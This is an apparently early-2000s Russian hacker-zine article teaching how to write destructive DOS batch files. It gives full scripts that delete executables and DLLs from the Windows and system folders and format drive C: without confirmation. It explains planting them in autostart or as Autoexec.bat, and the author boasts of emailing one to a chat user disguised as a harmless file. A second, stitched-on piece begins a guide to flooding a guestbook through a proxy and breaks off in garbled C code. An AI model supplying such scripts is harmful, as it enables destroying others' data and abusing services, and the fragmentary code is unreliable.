автор: Dan
http://hack-dan.org
e-mail: Hack-Dan@narod.ru
Данная статья, основана на статье Crypt'a "Строим Eraser за 5 минут!".
Давно хотел написать статью про bat файлы да руки не доходили, вот все - таки собрался и запустил Word. Начну наверное как и все с нудной истории, это даже и не история, в общем судить Вам.
Не секрет, что мне сейчас 16 лет (я 1985 года рождения). Учусь в Юридическом Техникуме на программера, так как я пошел в технарь с 9 класса, то на первом курсе идет школьная программа за два года в школе. Я Вам хочу скзать, что ЛАМАЗОВ просто пруд пруди, со мной учится в группе моя бывшая одноклассница, которая на первых парах информатики пальцы гнула, что она кул юзер, пришлось её быстро на место поставить, и что Вы думаете, она сейчас с остальными ламаками которые на клаве Enter найти не могут, юзает по досу, а я в это время уже экзамен сдал по информатике и в Форточках в игры играю!).
Так вот к чему я все это написал? А к тому, что многие или не знают или забыли простенький ДОС. А зря… Еще в школе я познакомился с ДОСом, и не жалею, ведь с помощью ДОСовских команд на удаленном кампе можно сделать очень много нехорошего! Хе-хе! Представьте, если Вы башковиты русский парень, то в школе начинают готовить к азам хака!).
Так, что же могут сделать эти маленькие bat файлы и как их сделать. Для тех кто хоть капельку имеет представление о ДОСовских командах будет все проще. Я же со своей стороны постараюсь объяснить каждую строчку.
Начнем.
Для написания нам понадобится любимая прога программеров Windows Commander (почему любимая? Да потому что с ее помощью с файлами можно творить все что угодно начиная с распаковки и кончая изменением расширением файла).
1. Запускаем ее.
2. Нажимаем Shift+F4, пишем любое название файла(install.bat), главное чтобы Вы поставили расширение *.bat.
Если Вы сделали все правильно, то должен открыться блокнот. Теперь пишим в нем команды которые батик будет выполнять на чужом кампе, помните все команды он делает последователь.
Грохаем windows на кампе жертвы:
Cd\ -команда для выхода в корневой каталог из места откуда был запущен bat файл
Cd C: -команда перехода на диск C где почти у всех кампах стоит виндовс
Сd windows -переходим в папку Windows (у 95% ламеров и юзеров папка называется именно так)
Большой минус бат файлов да и ДОСа в частности это то что нельзя удалять сразу папку с файлами, а нужно заходить в каждую папку отдельно и удалять там файлы.!!!
del *.exe -удаяем все файлы с расширением .exe
del *.ini -удаяем все файлы с расширением .ini
del *.com -удаяем все файлы с расширением .com
cd\
cd windows
cd system
del *.dll
del *.exe
После этих простеньких строчек у юзера или ламера будет примерно 30 минут работы!)
Код полностью:
Cd\
Cd C:
Сd windows
del *.exe
del *.ini
del *.com
cd\
cd windows
cd system
del *.dll
del *.exe
Ну что? Все написали? Теперь закрываем блокнот и видим, что создался файл install.bat. Я Вам не рекомендую его запускать у себя!)
Но вдруг папка виндовс называется не windows а например winMe, да без проблем, просто надо будет после этого кода написать ниже ещё один только чтобы папка называлась winMe и так далее.
Например:
Cd\
Cd C:
Сd windows
Del *.exe
Del *.ini
Del *.com
Cd\
Cd windows
Cd system
Del *.dll
Del *.exe
Cd\
Cd C:
Сd winMe
Del *.exe
Del *.ini
Del *.com
Cd\
Cd win98
Cd system
Del *.dll
Del *.exe
и так далее! Как вы понимаете таким образом можно грохнуть все что угодно на чужом винте! Только помните, что такое можно делать если на машине жертвы стоит
Windows 9Х!!!
Люблю прикалывать ламеров, это форматирование диска С:\
Форматируем диск С:\
Cd\ -команда для выхода в корневой каталог из места откуда был запущен bat файл
Format C:\ -команда форматирования диска
С:\ Y -команда автоматического согласие форматирование диска без ведома или подтверждения команды ламером
Y -тоже самое
Y -уже говорил
Хе! Вот и все…
Код полностью:
Cd\
Format C:\
Y
Y
Y
Единственный минус! Такой код может не сработать если на кампе стоит Windows ME или XP! Придется писать другой путь.
В этих форточках команда форматирования лежит не просто в папке Windows, а по следующему пути C:\WINDOWS\COMMAND\format c:, но само сабой форматироваться не будет, а потребует потверждение и простая команда
у
у
у
не поможет, нужена другая. Просто добавим параметр /autotest
C:\WINDOWS\COMMAND\format c: /autotest
В данном случае, подтверждать ничего не придется.
Воспользуемся входными потоками.
Этот путь сложнее, но интереснее предыдущего.
Расскажу лучше как отформатировать дискету вместо жесткого диска.
Нам потребуется еще один файл (например temp.temp), в котором будут записаны все клавиши, необходимые для подтверждения. В нашем случае это "Enter,Enter,No,Enter", т.е. вам необходимо в блокноте нажать два раза Enter, написать символ n и нажать Enter еще раз, сохранить и закрыть файл.
Теперь можно приступить непосредственно к форматированию с помощью комманды
C:\WINDOWS\COMMAND\format a: /q <temp.tmp
параметр /q - быстрое форматирование.
Как и где это применить?
Последний код (форматирования диска) я применял когда меня в чате на www.kuban.ru достал один критин. Он долго кидался матерными мессагами в которых были личные оскорбления да и сам чат успел зафлудить, но а я ведь не юзер, чтобы нажать "Игнор".
Сказал ему:
- Я - "Да ты тип я смотрю крутой! Но все-таки я думаю что ты ЛАМЕР!" (такое никого не оставит равнодушным!)
- Он -"Да я уже два чата сломал, а этот жалко он мне нравится, так что я не Ламер!"
- Я - "Коль ты шаришь в этом деле, лучше чем на меня мессаги лить помоги разобраться с этим файлом" (и посылаю ему на мыло мой батик, пускай хоть всеми антивирусами мира этот файл сканит не чего не найдет)
- Он -"Ну ладно, уговорил, помогу я тебе ЛАМЕРУ позорному"
В это время я считаю до пяти, и что… ОЛЕНЬ со свистом вылетает из чата!) Кстати его я уже давно не видел!)
Если Вы залезли на удаленный компьютер то можете тоже злостно пошутить.
Но как сделать так, чтобы файл запустился автоматически?
Лазив по кампу жертвы Вам вдруг захотелось форматнуть его винт, ну мало ли, вдруг он какой нибудь нацист или педофил! Разумеется Вы не сможите запустить файл со своего кампа на кампе жертвы. Но всеже есть пару вариантов. Первый, это загрузить файл в автозагрузку по пути
C:\windows (или как там буде папка называться)\Главное меню \ Программы \Автозагрузка
или переименовать Ваш батик в Autoexec.bat и загрузить в корневой С:\
Вот я думаю и просветил Вас в этом вопросе. Если у Вас есть пожелания, вопросы или замечания к статьи, то без промедления пишите в гостевуху! Даю 1000% что Вам в кратчайшие сроки дадут полный ответ на Ваш вопрос. акер/кодер/крякер/брякер! Речь в этой статейке пойдет опять про западло :). Не буду повторяться и говорить, что ты за свою коротенькую жизнь наверняка нажил себе кучу врагов, и как хорошо было бы сделать им что-нить нехорошее... Сразу предупреждаю, что господам куль-хацкерам и неткодерам со стажем здесь делать совершенно нечего.
Итак, твоя жертва - продвинутый чел. Он знает, что такое Интернет, Виндовс, знает, что "Виндовс маст дай", но не знает почему, и он не понимает, почему все вокруг так любят пингвинов. А кроме того он надыбал себе домашнюю страничку (в Word'е, ессесно) и выложил ее в инет по адресу... ну, скажем, i-am-cool-hacker.narod.ru. Кроме всего прочего, он поставил себе народовскую бесплатную гесту, куда и тащит всех своих друзей и знакомых "расписаться". Вот гестой мы и займемся...
Для успешного выполнения миссии тебе потребуются *nix'ы и документашка по программированию сокетов, которую можно найти на каждом шагу. Но так как ты еще _начинающий_, у тебя имеется в наличии Windows и Q3. В лучшем случае в каталоге c:\windows\temp\porno\not_for_parents\trash\to_delete храниться архив с паскалем. Сразу скажу, что он не покатит и потребуется Сишный компилятор (например, можно стянуть с http://www.borland.com бесплатную версию). Да, чуть не забыл. Счастливым обладателям Windows'95 (и такие есть?) жизненно необходима библиотека со вторым WinSock'ом, которую можно стянуть с майкрософтовского сайта. Итак, приступим...
Принцип западла предельно прост: зафлудить гостевуху ;). Это не всем уже надоевший мэйлбомбинг, а нечто, встречающееся довольно редко (пока что :). К тому же, у начинах довольно часто возникают вопросы вроде "Как написть мэйлбомбер?", и их отсылают на 4 известных буквы... Хм... Так вот, чтобы отправить сообщение на большинстве бесплатных гостевух достаточно одного пакета :). То есть, берем TCP Logger (http://www.uinc.ru), и перехватываем пакет, в котором отправляется запрос на добавление записи. А дальше все очень просто - коннектимся к проксе (желательно анонимной), и отправляем штук 100-200 таких пакетов. Что, это для ламаков-----------------BEGINNING--------
#include
SOCKET sock; //сама5] = /*proxy ip*/, buff, pack_file[256];
int proxy_port = /*proxy port*/, counter, maxcount;
FILE *packet;